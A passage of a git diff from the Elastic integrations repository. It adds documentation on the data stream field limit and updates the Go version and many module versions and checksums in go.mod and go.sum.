default, data streams will have a `total_fields.limit` setting of 1000. Besides defined custom fields, this also includes dynamically generated ECS fields. If your data stream is expected to eventually house more than 1000 fields, set an explicit limit in the `manifest.yml` of the data stream: +```yaml +elasticsearch: + index_template: + settings: + index: + mapping: + total_fields: + limit: 5000 +``` + +Note: For backwards compatibility, the limit is automatically bumped to 10000 fields if there are more than 500 fields explicitly defined for a data stream, however newly created integrations should not rely on this behavior but instead assume a fixed limit of 1000 fields. + ##### Specify metric types and units As part of the field definition, there are two settings that add metadata which will help Kibana graphing it: diff --git a/go.mod b/go.mod index 49b1cc480c6..da6636baf7a 100644 --- a/go.mod +++ b/go.mod @@ -1,26 +1,26 @@ module github.com/elastic/integrations -go 1.21.0 +go 1.22.0 require ( github.com/blang/semver v3.5.1+incompatible - github.com/elastic/elastic-package v0.96.0 + github.com/elastic/elastic-package v0.99.0 github.com/elastic/go-licenser v0.4.1 - github.com/elastic/package-registry v1.23.0 + github.com/elastic/package-registry v1.24.0 github.com/magefile/mage v1.15.0 github.com/pkg/errors v0.9.1 - github.com/stretchr/testify v1.8.4 - golang.org/x/tools v0.17.0 + github.com/stretchr/testify v1.9.0 + golang.org/x/tools v0.20.0 gopkg.in/yaml.v2 v2.4.0 ) require ( - cloud.google.com/go v0.110.10 // indirect - cloud.google.com/go/compute v1.23.3 // indirect + cloud.google.com/go v0.112.1 // indirect + cloud.google.com/go/compute v1.24.0 // indirect cloud.google.com/go/compute/metadata v0.2.3 // indirect - cloud.google.com/go/iam v1.1.5 // indirect - cloud.google.com/go/pubsub v1.33.0 // indirect - cloud.google.com/go/storage v1.35.1 // indirect + cloud.google.com/go/iam v1.1.7 // indirect + cloud.google.com/go/pubsub v1.37.0 // indirect + cloud.google.com/go/storage v1.40.0 // indirect github.com/AlecAivazis/survey/v2 v2.3.7 // indirect github.com/Azure/go-ansiterm v0.0.0-20210617225240-d185dfc1b5a1 // indirect github.com/MakeNowJust/heredoc v1.0.0 // indirect @@ -32,7 +32,7 @@ require ( github.com/Pallinder/go-randomdata v1.2.0 // indirect github.com/ProtonMail/go-crypto v0.0.0-20230828082145-3c4c8a2d2371 // indirect github.com/ProtonMail/go-mime v0.0.0-20230322103455-7d82a3887f2f // indirect - github.com/ProtonMail/gopenpgp/v2 v2.7.4 // indirect + github.com/ProtonMail/gopenpgp/v2 v2.7.5 // indirect github.com/andybalholm/brotli v1.0.4 // indirect github.com/armon/go-radix v1.0.0 // indirect github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d // indirect @@ -46,24 +46,25 @@ require ( github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc // indirect github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5 // indirect github.com/dustin/go-humanize v1.0.1 // indirect - github.com/elastic/elastic-integration-corpus-generator-tool v0.9.0 // indirect + github.com/elastic/elastic-integration-corpus-generator-tool v0.10.0 // indirect github.com/elastic/go-elasticsearch/v7 v7.17.10 // indirect github.com/elastic/go-resource v0.1.1 // indirect github.com/elastic/go-sysinfo v1.9.0 // indirect - github.com/elastic/go-ucfg v0.8.6 // indirect + github.com/elastic/go-ucfg v0.8.8 // indirect github.com/elastic/go-windows v1.0.1 // indirect github.com/elastic/gojsonschema v1.2.1 // indirect github.com/elastic/kbncontent v0.1.3 // indirect - github.com/elastic/package-spec/v3 v3.0.4 // indirect + github.com/elastic/package-spec/v3 v3.1.3 // indirect github.com/emicklei/go-restful/v3 v3.11.0 // indirect github.com/evanphx/json-patch v5.7.0+incompatible // indirect - github.com/evanphx/json-patch/v5 v5.8.1 // indirect + github.com/evanphx/json-patch/v5 v5.9.0 // indirect github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f // indirect github.com/fatih/color v1.16.0 // indirect github.com/felixge/httpsnoop v1.0.4 // indirect - github.com/fsouza/fake-gcs-server v1.47.6 // indirect + github.com/fsouza/fake-gcs-server v1.48.0 // indirect github.com/go-errors/errors v1.4.2 // indirect - github.com/go-logr/logr v1.3.0 // indirect + github.com/go-logr/logr v1.4.1 // indirect + github.com/go-logr/stdr v1.2.2 // indirect github.com/go-ole/go-ole v1.2.6 // indirect github.com/go-openapi/errors v0.20.3 // indirect github.com/go-openapi/jsonpointer v0.19.6 // indirect @@ -72,7 +73,7 @@ require ( github.com/go-openapi/swag v0.22.3 // indirect github.com/gogo/protobuf v1.3.2 // indirect github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da // indirect - github.com/golang/protobuf v1.5.3 // indirect + github.com/golang/protobuf v1.5.4 // indirect github.com/golang/snappy v0.0.4 // indirect github.com/google/btree v1.1.2 // indirect github.com/google/gnostic-models v0.6.8 // indirect @@ -85,8 +86,8 @@ require ( github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 // indirect github.com/google/uuid v1.6.0 // indirect github.com/googleapis/enterprise-certificate-proxy v0.3.2 // indirect - github.com/googleapis/gax-go/v2 v2.12.0 // indirect - github.com/gorilla/handlers v1.5.1 // indirect + github.com/googleapis/gax-go/v2 v2.12.3 // indirect + github.com/gorilla/handlers v1.5.2 // indirect github.com/gorilla/mux v1.8.1 // indirect github.com/gorilla/websocket v1.5.0 // indirect github.com/gregjones/httpcache v0.0.0-20190611155906-901d90724c79 // indirect @@ -102,7 +103,7 @@ require ( github.com/josharian/intern v1.0.0 // indirect github.com/json-iterator/go v1.1.12 // indirect github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect - github.com/klauspost/compress v1.17.0 // indirect + github.com/klauspost/compress v1.17.6 // indirect github.com/klauspost/pgzip v1.2.5 // indirect github.com/liggitt/tabwriter v0.0.0-20181228230101-89fcab3d43de // indirect github.com/lithammer/shortuuid/v3 v3.0.7 // indirect @@ -111,7 +112,6 @@ require ( github.com/mattn/go-colorable v0.1.13 // indirect github.com/mattn/go-isatty v0.0.20 // indirect github.com/mattn/go-runewidth v0.0.14 // indirect - github.com/matttproud/golang_protobuf_extensions v1.0.4 // indirect github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d // indirect github.com/mholt/archiver/v3 v3.5.1 // indirect github.com/mitchellh/copystructure v1.2.0 // indirect @@ -133,20 +133,20 @@ require ( github.com/pkg/xattr v0.4.9 // indirect github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 // indirect github.com/power-devops/perfstat v0.0.0-20210106213030-5aafc221ea8c // indirect - github.com/prometheus/client_golang v1.17.0 // indirect - github.com/prometheus/client_model v0.4.1-0.20230718164431-9a2bf3000d16 // indirect - github.com/prometheus/common v0.44.0 // indirect - github.com/prometheus/procfs v0.11.1 // indirect + github.com/prometheus/client_golang v1.19.0 // indirect + github.com/prometheus/client_model v0.5.0 // indirect + github.com/prometheus/common v0.48.0 // indirect + github.com/prometheus/procfs v0.12.0 // indirect github.com/rivo/uniseg v0.4.3 // indirect github.com/russross/blackfriday/v2 v2.1.0 // indirect - github.com/shirou/gopsutil/v3 v3.23.12 // indirect + github.com/shirou/gopsutil/v3 v3.24.2 // indirect github.com/shoenig/go-m1cpu v0.1.6 // indirect github.com/shopspring/decimal v1.3.1 // indirect github.com/spf13/afero v1.11.0 // indirect - github.com/spf13/cast v1.5.1 // indirect + github.com/spf13/cast v1.6.0 // indirect github.com/spf13/cobra v1.8.0 // indirect github.com/spf13/pflag v1.0.5 // indirect - github.com/stretchr/objx v0.5.1 // indirect + github.com/stretchr/objx v0.5.2 // indirect github.com/tklauser/go-sysconf v0.3.12 // indirect github.com/tklauser/numcpus v0.6.1 // indirect github.com/ulikunitz/xz v0.5.11 // indirect @@ -154,44 +154,48 @@ require ( github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 // indirect github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 // indirect github.com/xlab/treeprint v1.2.0 // indirect - github.com/yusufpapurcu/wmi v1.2.3 // indirect - go.elastic.co/apm/module/apmgorilla/v2 v2.4.7 // indirect - go.elastic.co/apm/module/apmhttp/v2 v2.4.7 // indirect - go.elastic.co/apm/module/apmzap/v2 v2.4.7 // indirect - go.elastic.co/apm/v2 v2.4.7 // indirect + github.com/yusufpapurcu/wmi v1.2.4 // indirect + go.elastic.co/apm/module/apmgorilla/v2 v2.5.0 // indirect + go.elastic.co/apm/module/apmhttp/v2 v2.5.0 // indirect + go.elastic.co/apm/module/apmzap/v2 v2.5.0 // indirect + go.elastic.co/apm/v2 v2.5.0 // indirect go.elastic.co/ecszap v1.0.2 // indirect go.elastic.co/fastjson v1.1.0 // indirect go.mongodb.org/mongo-driver v1.11.1 // indirect go.opencensus.io v0.24.0 // indirect + go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.49.0 // indirect + go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.49.0 // indirect + go.opentelemetry.io/otel v1.24.0 // indirect + go.opentelemetry.io/otel/metric v1.24.0 // indirect + go.opentelemetry.io/otel/trace v1.24.0 // indirect go.starlark.net v0.0.0-20230525235612-a134d8f9ddca // indirect go.uber.org/multierr v1.11.0 // indirect - go.uber.org/zap v1.26.0 // indirect - golang.org/x/crypto v0.18.0 // indirect - golang.org/x/mod v0.14.0 // indirect - golang.org/x/net v0.20.0 // indirect - golang.org/x/oauth2 v0.15.0 // indirect - golang.org/x/sync v0.6.0 // indirect - golang.org/x/sys v0.16.0 // indirect - golang.org/x/term v0.16.0 // indirect + go.uber.org/zap v1.27.0 // indirect + golang.org/x/crypto v0.22.0 // indirect + golang.org/x/mod v0.17.0 // indirect + golang.org/x/net v0.24.0 // indirect + golang.org/x/oauth2 v0.18.0 // indirect + golang.org/x/sync v0.7.0 // indirect + golang.org/x/sys v0.19.0 // indirect + golang.org/x/term v0.19.0 // indirect golang.org/x/text v0.14.0 // indirect golang.org/x/time v0.5.0 // indirect - golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2 // indirect - google.golang.org/api v0.152.0 // indirect - google.golang.org/appengine v1.6.7 // indirect - google.golang.org/genproto v0.0.0-20231106174013-bbf56f31fb17 // indirect - google.golang.org/genproto/googleapis/api v0.0.0-20231106174013-bbf56f31fb17 // indirect - google.golang.org/genproto/googleapis/rpc v0.0.0-20231120223509-83a465c0220f // indirect - google.golang.org/grpc v1.59.0 // indirect - google.golang.org/protobuf v1.31.0 // indirect + google.golang.org/api v0.171.0 // indirect + google.golang.org/appengine v1.6.8 // indirect + google.golang.org/genproto v0.0.0-20240213162025-012b6fc9bca9 // indirect + google.golang.org/genproto/googleapis/api v0.0.0-20240314234333-6e1732d8331c // indirect + google.golang.org/genproto/googleapis/rpc v0.0.0-20240314234333-6e1732d8331c // indirect + google.golang.org/grpc v1.62.1 // indirect + google.golang.org/protobuf v1.33.0 // indirect gopkg.in/inf.v0 v0.9.1 // indirect gopkg.in/yaml.v3 v3.0.1 // indirect - helm.sh/helm/v3 v3.14.0 // indirect + helm.sh/helm/v3 v3.14.3 // indirect howett.net/plist v1.0.0 // indirect - k8s.io/api v0.29.1 // indirect + k8s.io/api v0.29.3 // indirect k8s.io/apiextensions-apiserver v0.29.0 // indirect - k8s.io/apimachinery v0.29.1 // indirect - k8s.io/cli-runtime v0.29.1 // indirect - k8s.io/client-go v0.29.1 // indirect + k8s.io/apimachinery v0.29.3 // indirect + k8s.io/cli-runtime v0.29.3 // indirect + k8s.io/client-go v0.29.3 // indirect k8s.io/component-base v0.29.0 // indirect k8s.io/klog/v2 v2.110.1 // indirect k8s.io/kube-openapi v0.0.0-20231010175941-2dd684a91f00 // indirect diff --git a/go.sum b/go.sum index b338e7c5fa0..fa3c5d339e1 100644 --- a/go.sum +++ b/go.sum @@ -1,18 +1,18 @@ cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= -cloud.google.com/go v0.110.10 h1:LXy9GEO+timppncPIAZoOj3l58LIU9k+kn48AN7IO3Y= -cloud.google.com/go v0.110.10/go.mod h1:v1OoFqYxiBkUrruItNM3eT4lLByNjxmJSV/xDKJNnic= -cloud.google.com/go/compute v1.23.3 h1:6sVlXXBmbd7jNX0Ipq0trII3e4n1/MsADLK6a+aiVlk= -cloud.google.com/go/compute v1.23.3/go.mod h1:VCgBUoMnIVIR0CscqQiPJLAG25E3ZRZMzcFZeQ+h8CI= +cloud.google.com/go v0.112.1 h1:uJSeirPke5UNZHIb4SxfZklVSiWWVqW4oXlETwZziwM= +cloud.google.com/go v0.112.1/go.mod h1:+Vbu+Y1UU+I1rjmzeMOb/8RfkKJK2Gyxi1X6jJCZLo4= +cloud.google.com/go/compute v1.24.0 h1:phWcR2eWzRJaL/kOiJwfFsPs4BaKq1j6vnpZrc1YlVg= +cloud.google.com/go/compute v1.24.0/go.mod h1:kw1/T+h/+tK2LJK0wiPPx1intgdAM3j/g3hFDlscY40= cloud.google.com/go/compute/metadata v0.2.3 h1:mg4jlk7mCAj6xXp9UJ4fjI9VUI5rubuGBW5aJ7UnBMY= cloud.google.com/go/compute/metadata v0.2.3/go.mod h1:VAV5nSsACxMJvgaAuX6Pk2AawlZn8kiOGuCv6gTkwuA= -cloud.google.com/go/iam v1.1.5 h1:1jTsCu4bcsNsE4iiqNT5SHwrDRCfRmIaaaVFhRveTJI= -cloud.google.com/go/iam v1.1.5/go.mod h1:rB6P/Ic3mykPbFio+vo7403drjlgvoWfYpJhMXEbzv8= -cloud.google.com/go/kms v1.15.5 h1:pj1sRfut2eRbD9pFRjNnPNg/CzJPuQAzUujMIM1vVeM= -cloud.google.com/go/kms v1.15.5/go.mod h1:cU2H5jnp6G2TDpUGZyqTCoy1n16fbubHZjmVXSMtwDI= -cloud.google.com/go/pubsub v1.33.0 h1:6SPCPvWav64tj0sVX/+npCBKhUi/UjJehy9op/V3p2g= -cloud.google.com/go/pubsub v1.33.0/go.mod h1:f+w71I33OMyxf9VpMVcZbnG5KSUkCOUHYpFd5U1GdRc= -cloud.google.com/go/storage v1.35.1 h1:B59ahL//eDfx2IIKFBeT5Atm9wnNmj3+8xG/W4WB//w= -cloud.google.com/go/storage v1.35.1/go.mod h1:M6M/3V/D3KpzMTJyPOR/HU6n2Si5QdaXYEsng2xgOs8= +cloud.google.com/go/iam v1.1.7 h1:z4VHOhwKLF/+UYXAJDFwGtNF0b6gjsW1Pk9Ml0U/IoM= +cloud.google.com/go/iam v1.1.7/go.mod h1:J4PMPg8TtyurAUvSmPj8FF3EDgY1SPRZxcUGrn7WXGA= +cloud.google.com/go/kms v1.15.7 h1:7caV9K3yIxvlQPAcaFffhlT7d1qpxjB1wHBtjWa13SM= +cloud.google.com/go/kms v1.15.7/go.mod h1:ub54lbsa6tDkUwnu4W7Yt1aAIFLnspgh0kPGToDukeI= +cloud.google.com/go/pubsub v1.37.0 h1:0uEEfaB1VIJzabPpwpZf44zWAKAme3zwKKxHk7vJQxQ= +cloud.google.com/go/pubsub v1.37.0/go.mod h1:YQOQr1uiUM092EXwKs56OPT650nwnawc+8/IjoUeGzQ= +cloud.google.com/go/storage v1.40.0 h1:VEpDQV5CJxFmJ6ueWNsKxcr1QAYOXEgxDa+sBbJahPw= +cloud.google.com/go/storage v1.40.0/go.mod h1:Rrj7/hKlG87BLqDJYtwR0fbPld8uJPbQ2ucUMY7Ir0g= github.com/AlecAivazis/survey/v2 v2.3.7 h1:6I/u8FvytdGsgonrYsVn2t8t4QiRnh6QSTqkkhIiSjQ= github.com/AlecAivazis/survey/v2 v2.3.7/go.mod h1:xUTIdE4KCOIjsBAE1JYsUPoCqYdZ1reCfTwbto0Fduo= github.com/Azure/go-ansiterm v0.0.0-20210617225240-d185dfc1b5a1 h1:UQHMgLO+TxOElx5B5HZ4hJQsoJ/PvUvKRhJHDQXO8P8= @@ -42,8 +42,8 @@ github.com/ProtonMail/go-crypto v0.0.0-20230828082145-3c4c8a2d2371 h1:kkhsdkhsCv github.com/ProtonMail/go-crypto v0.0.0-20230828082145-3c4c8a2d2371/go.mod h1:EjAoLdwvbIOoOQr3ihjnSoLZRtE8azugULFRteWMNc0= github.com/ProtonMail/go-mime v0.0.0-20230322103455-7d82a3887f2f h1:tCbYj7/299ekTTXpdwKYF8eBlsYsDVoggDAuAjoK66k= github.com/ProtonMail/go-mime v0.0.0-20230322103455-7d82a3887f2f/go.mod h1:gcr0kNtGBqin9zDW9GOHcVntrwnjrK+qdJ06mWYBybw= -github.com/ProtonMail/gopenpgp/v2 v2.7.4 h1:Vz/8+HViFFnf2A6XX8JOvZMrA6F5puwNvvF21O1mRlo= -github.com/ProtonMail/gopenpgp/v2 v2.7.4/go.mod h1:IhkNEDaxec6NyzSI0PlxapinnwPVIESk8/76da3Ct3g= +github.com/ProtonMail/gopenpgp/v2 v2.7.5 h1:STOY3vgES59gNgoOt2w0nyHBjKViB/qSg7NjbQWPJkA= +github.com/ProtonMail/gopenpgp/v2 v2.7.5/go.mod h1:IhkNEDaxec6NyzSI0PlxapinnwPVIESk8/76da3Ct3g= github.com/andybalholm/brotli v1.0.1/go.mod h1:loMXtMfwqflxFJPmdbJO0a3KNoPuLBgiu3qAvBg8x/Y= github.com/andybalholm/brotli v1.0.4 h1:V7DdXeJtZscaqfNuAdSRuRFzuiKlHSC/Zh3zl9qY3JY= github.com/andybalholm/brotli v1.0.4/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= @@ -93,10 +93,10 @@ github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5/go.mod h1:qssHWj6 github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY= github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY= github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto= -github.com/elastic/elastic-integration-corpus-generator-tool v0.9.0 h1:SItTCXxjpeE2kr+3bptl7ZmG3P88pLDCXX23tObteTc= -github.com/elastic/elastic-integration-corpus-generator-tool v0.9.0/go.mod h1:9Jjc1xsrnMwOA3TfG0arlXRCb0AhShCUU4YtwpBCURI= -github.com/elastic/elastic-package v0.96.0 h1:RLkNBElCuRZ53/e09HvrZfpwlEYQzazJp77F913mYxM= -github.com/elastic/elastic-package v0.96.0/go.mod h1:kR2uD/65qcUS8UClGT8QxoJsgdDjzUyI94X/PScF2Jg= +github.com/elastic/elastic-integration-corpus-generator-tool v0.10.0 h1:sx1lpZuTG5suJuvgix4FWQFCLFFbzkoOmPoHWYOPLCY= +github.com/elastic/elastic-integration-corpus-generator-tool v0.10.0/go.mod h1:2/30n+2QRzRzus4TPVUV1T3U/j8g2ItUgvP0pcpjLGk= +github.com/elastic/elastic-package v0.99.0 h1:VkZM/OqISPt9S6QQFRUiEONmqHIaSJM2yl9uETddF+A= +github.com/elastic/elastic-package v0.99.0/go.mod h1:JTVHETbekKMbqy8kedyzZ58qextRKFYJgGrRZkNct4Y= github.com/elastic/go-elasticsearch/v7 v7.17.10 h1:TCQ8i4PmIJuBunvBS6bwT2ybzVFxxUhhltAs3Gyu1yo= github.com/elastic/go-elasticsearch/v7 v7.17.10/go.mod h1:OJ4wdbtDNk5g503kvlHLyErCgQwwzmDtaFC4XyOxXA4= github.com/elastic/go-licenser v0.4.1 h1:1xDURsc8pL5zYT9R29425J3vkHdt4RT5TNEMeRN48x4= @@ -105,18 +105,18 @@ github.com/elastic/go-resource v0.1.1 h1:vM173uhPoaZ7C64rKrYbbBn5kxOhstE1+YcGFte github.com/elastic/go-resource v0.1.1/go.mod h1:7F1Wjs6eSFX0i/235yAK/x9bvPNd9/ML92AiULa4XYA= github.com/elastic/go-sysinfo v1.9.0 h1:usICqY/Nw4Mpn9f4LdtpFrKxXroJDe81GaxxUlCckIo= github.com/elastic/go-sysinfo v1.9.0/go.mod h1:eBD1wEGVaRnRLGecc9iG1z8eOv5HnEdz9+nWd8UAxcE= -github.com/elastic/go-ucfg v0.8.6 h1:stUeyh2goTgGX+/wb9gzKvTv0YB0231LTpKUgCKj4U0= -github.com/elastic/go-ucfg v0.8.6/go.mod h1:4E8mPOLSUV9hQ7sgLEJ4bvt0KhMuDJa8joDT2QGAEKA= +github.com/elastic/go-ucfg v0.8.8 h1:54KIF/2zFKfl0MzsSOCGOsZ3O2bnjFQJ0nDJcLhviyk= +github.com/elastic/go-ucfg v0.8.8/go.mod h1:4E8mPOLSUV9hQ7sgLEJ4bvt0KhMuDJa8joDT2QGAEKA= github.com/elastic/go-windows v1.0.1 h1:AlYZOldA+UJ0/2nBuqWdo90GFCgG9xuyw9SYzGUtJm0= github.com/elastic/go-windows v1.0.1/go.mod h1:FoVvqWSun28vaDQPbj2Elfc0JahhPB7WQEGa3c814Ss= github.com/elastic/gojsonschema v1.2.1 h1:cUMbgsz0wyEB4x7xf3zUEvUVDl6WCz2RKcQPul8OsQc= github.com/elastic/gojsonschema v1.2.1/go.mod h1:biw5eBS2Z4T02wjATMRSfecfjCmwaDPvuaqf844gLrg= github.com/elastic/kbncontent v0.1.3 h1:qT0RkshRhiAgH51dDD983tJloeLLMCYE/qlRRtn3R8k= github.com/elastic/kbncontent v0.1.3/go.mod h1:kOPREITK9gSJsiw/WKe7QWSO+PRiZMyEFQCw+CMLAHI= -github.com/elastic/package-registry v1.23.0 h1:+4lRKzpyw4bV1FARijKHH25zNatGdq6cAOI4CwSkB4Q= -github.com/elastic/package-registry v1.23.0/go.mod h1:wcSKCjvARw05GqJEc3Akr35p5jYG5HLKgny/7dghuzA= -github.com/elastic/package-spec/v3 v3.0.4 h1:IZDRpVoMPztSgONUGbTR6re0VxpkitMDR/HwcLQpt7g= -github.com/elastic/package-spec/v3 v3.0.4/go.mod h1:zMVyksPTDFsWxxdbw3ahXBs6O0G2tULA7HXjFl8w8zA= +github.com/elastic/package-registry v1.24.0 h1:LAhw2J3qg4av5yGBa/6ZhF6I87RlnAAKSQQnoxxzDf8= +github.com/elastic/package-registry v1.24.0/go.mod h1:c/xP7+n9csO7ts6UFe7x2CkN7M7KGxVg/uyGbbnzMxQ= +github.com/elastic/package-spec/v3 v3.1.3 h1:MxFjUMdiFiTgSIsXppR7sv91BA7JTyr/HuUK6NeFiPI= +github.com/elastic/package-spec/v3 v3.1.3/go.mod h1:GibfBsEvTOhQJA5kojOEXS+IIo49MPu6IgydhXSH1iY= github.com/emicklei/go-restful/v3 v3.11.0 h1:rAQeMHw1c7zTmncogyy8VvRZwtkmkZ4FxERmMY4rD+g= github.com/emicklei/go-restful/v3 v3.11.0/go.mod h1:6n3XBCmQQb25CM2LCACGz8ukIrRry+4bhvbpWn3mrbc= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= @@ -125,23 +125,26 @@ github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1m github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/evanphx/json-patch v5.7.0+incompatible h1:vgGkfT/9f8zE6tvSCe74nfpAVDQ2tG6yudJd8LBksgI= github.com/evanphx/json-patch v5.7.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= -github.com/evanphx/json-patch/v5 v5.8.1 h1:iPEdwg0XayoS+E7Mth9JxwUtOgyVxnDTXHtKhZPlZxA= -github.com/evanphx/json-patch/v5 v5.8.1/go.mod h1:VNkHZ/282BpEyt/tObQO8s5CMPmYYq14uClGH4abBuQ= +github.com/evanphx/json-patch/v5 v5.9.0 h1:kcBlZQbplgElYIlo/n1hJbls2z/1awpXxpRi0/FOJfg= +github.com/evanphx/json-patch/v5 v5.9.0/go.mod h1:VNkHZ/282BpEyt/tObQO8s5CMPmYYq14uClGH4abBuQ= github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f h1:Wl78ApPPB2Wvf/TIe2xdyJxTlb6obmF18d8QdkxNDu4= github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f/go.mod h1:OSYXu++VVOHnXeitef/D8n/6y4QV8uLHSFXX4NeXMGc= github.com/fatih/color v1.16.0 h1:zmkK9Ngbjj+K0yRhTVONQh1p/HknKYSlNT+vZCzyokM= github.com/fatih/color v1.16.0/go.mod h1:fL2Sau1YI5c0pdGEVCbKQbLXB6edEj1ZgiY4NijnWvE= -github.com/felixge/httpsnoop v1.0.1/go.mod h1:m8KPJKqk1gH5J9DgRY2ASl2lWCfGKXixSwevea8zH2U= github.com/felixge/httpsnoop v1.0.4 h1:NFTV2Zj1bL4mc9sqWACXbQFVBBg2W3GPvqp8/ESS2Wg= github.com/felixge/httpsnoop v1.0.4/go.mod h1:m8KPJKqk1gH5J9DgRY2ASl2lWCfGKXixSwevea8zH2U= -github.com/frankban/quicktest v1.14.4 h1:g2rn0vABPOOXmZUj+vbmUp0lPoXEMuhTpIluN0XL9UY= -github.com/frankban/quicktest v1.14.4/go.mod h1:4ptaffx2x8+WTWXmUCuVU6aPUX1/Mz7zb5vbUoiM6w0= -github.com/fsouza/fake-gcs-server v1.47.6 h1:/d/879q/Os9Zc5gyV3QVLfZoajN1KcWucf2zYCFeFxs= -github.com/fsouza/fake-gcs-server v1.47.6/go.mod h1:ApSXKexpG1BUXJ4f2tNCxvhTKwCPFqFLBDW2UNQDODE= +github.com/frankban/quicktest v1.14.6 h1:7Xjx+VpznH+oBnejlPUj8oUpdxnVs4f8XU8WnHkI4W8= +github.com/frankban/quicktest v1.14.6/go.mod h1:4ptaffx2x8+WTWXmUCuVU6aPUX1/Mz7zb5vbUoiM6w0= +github.com/fsouza/fake-gcs-server v1.48.0 h1:CBjqlg0nout6XawFtLTKfdBP65SfE2kOnQs+FIOCV/U= +github.com/fsouza/fake-gcs-server v1.48.0/go.mod h1:2F2TAO5Dttmzu8lXSyg9XG1o8lNfrMkw2m1VdVVSa00= github.com/go-errors/errors v1.4.2 h1:J6MZopCL4uSllY1OfXM374weqZFFItUbrImctkmUxIA= github.com/go-errors/errors v1.4.2/go.mod h1:sIVyrIiJhuEF+Pj9Ebtd6P/rEYROXFi3BopGUQ5a5Og= -github.com/go-logr/logr v1.3.0 h1:2y3SDp0ZXuc6/cjLSZ+Q3ir+QB9T/iG5yYRXqsagWSY= +github.com/go-logr/logr v1.2.2/go.mod 